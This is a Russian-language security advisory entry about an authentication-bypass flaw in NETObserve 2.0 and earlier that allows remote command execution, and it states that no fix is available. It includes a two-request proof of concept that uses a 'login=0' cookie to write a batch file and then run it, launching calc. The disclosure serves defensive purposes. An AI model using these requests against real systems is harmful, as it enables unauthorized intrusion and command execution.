| Дата публикации: | 04.01.2004 |
| Всего просмотров: | 1356 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Обход ограничений безопасности |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
NETObserve 1.x
NETObserve 2.x |
| Уязвимые версии: NETObserve 2.0 и более ранние версии
Описание: Уязвимость обнаружена в NETObserve. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может подключиться к целевой системе, используя специально обработанный HTTP заголовок, чтобы внедриться в административную сессию. Пример/Эксплоит: REQUEST #1: -------------------------------------------------------------------------- POST /sendeditfile HTTP/1.1 Accept: */* Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat? Content-Type: application/x-www-form-urlencoded Host: AnyHostWillDo Content-Length: 25 Cookie: login=0 newfiledata=cmd+%2Fc+calc -------------------------------------------------------------------------- REQUEST #2: -------------------------------------------------------------------------- GET /runfile=?C:\windows\win.bat? HTTP/1.1 Accept: */* Host: AnyHostWillDo Cookie: login=0 -------------------------------------------------------------------------- URL производителя: http://www.exploreanywhere.com/no-intro.php Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | NetObserve Security Bypass Vulnerability |